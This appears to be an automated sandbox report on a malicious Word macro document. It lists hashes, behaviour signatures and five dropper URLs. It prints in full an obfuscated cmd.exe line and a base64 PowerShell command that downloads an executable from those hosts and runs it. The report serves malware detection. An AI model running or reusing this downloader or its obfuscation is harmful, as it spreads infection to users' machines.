Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-05-2024 10:53

General

  • Target

    JHL_D_3392853_28_08_2018.doc

  • Size

    83KB

  • MD5

    e4625136904c387f83100ce9861b2e21

  • SHA1

    3b29428a6cea904abd2903d5623fd7094914fec6

  • SHA256

    8db36a2bb5a769e6d5f1598734a7f26fcabed65197a0463a3ff1cc1486953d3c

  • SHA512

    191b87540c3f9d8ae06dd0532e22dafab46f2ab247a682f40f1a5a7bbdaa5e3b14e900a9195ef1077421695f9dfa3525d3a2b950a4eece65ad9200d0b4eebd9d

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aA7IrlnKchqXN076KC0It4oC:3te2dw99fx2vR1It4

Score
10/10

Malware Config

Extracted

  • Language
    ps1

  • Deobfuscated URLs (each tagged exe.dropper)
    http://aliu-rdc.org/QwWKYJxM
    http://2idiotsandnobusinessplan.com/wC7
    http://7naturalessences.com/DFaSvtrS
    http://benimdunyamkres.com/v0vig1G1
    http://hostmktar.com/mP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JHL_D_3392853_28_08_2018.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3060
      • C:\Windows\SysWOW64\CMd.exe
        CMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABqAEEAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABGAG8ATgA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAaQB1AC0AcgBkAGMALgBvAHIAZwAvAFEAdwBXAEsAWQBKAHgATQBAAGgAdAB0AHAAOgAvAC8AMgBpAGQAaQBvAHQAcwBhAG4AZABuAG8AYgB1AHMAaQBuAGUAcwBzAHAAbABhAG4ALgBjAG8AbQAvAHcAQwA3AEAAaAB0AHQAcAA6AC8ALwA3AG4AYQB0AHUAcgBhAGwAZQBzAHMAZQBuAGMAZQBzAC4AYwBvAG0ALwBEAEYAYQBTAHYAdAByAFMAQABoAHQAdABwADoALwAvAGIAZQBuAGkAbQBkAHUAbgB5AGEAbQBrAHIAZQBzAC4AYwBvAG0ALwB2ADAAdgBpAGcAMQBHADEAQABoAHQAdABwADoALwAvAGgAbwBzAHQAbQBrAHQAYQByAC4AYwBvAG0ALwBtAFAAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAAdgBmACAAPQAgACcANwAxADAAJwA7ACQARgBDAE4APQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUAB2AGYAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAaABTACAAaQBuACAAJABGAG8ATgApAHsAdAByAHkAewAkAGoAQQByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYAaABTACwAIAAkAEYAQwBOACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAQwBOADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3020

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize: 20KB
      MD5: 3bdeef911c93e96b920609dc3499505c
      SHA1: e83acf7aa7e37ea4013d2703dd8d4094f6153af0
      SHA256: 0231bd8b5362fc2927d9e2f93b77a5220857a986954cf0a2fda0a86e533ad978
      SHA512: 03572a7309f04dd0d91fc68b66c6d61e8192632f2fcabb4b036ad19f50f679792a0ccbf1005ea5b8b06e1e98a6329b44505a8fae2af451b8f896c5c6d0bb84b6

    • memory/2176-12-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-73-0x00000000712AD000-0x00000000712B8000-memory.dmp (Filesize: 44KB)
    • memory/2176-19-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-13-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-38-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-36-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-43-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-31-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-26-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-11-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-7-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-2-0x00000000712AD000-0x00000000712B8000-memory.dmp (Filesize: 44KB)
    • memory/2176-25-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-9-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-42-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-8-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-6-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-10-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-56-0x00000000712AD000-0x00000000712B8000-memory.dmp (Filesize: 44KB)
    • memory/2176-57-0x0000000000390000-0x0000000000490000-memory.dmp (Filesize: 1024KB)
    • memory/2176-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
    • memory/2176-72-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
    • memory/2176-0-0x000000002F961000-0x000000002F962000-memory.dmp (Filesize: 4KB)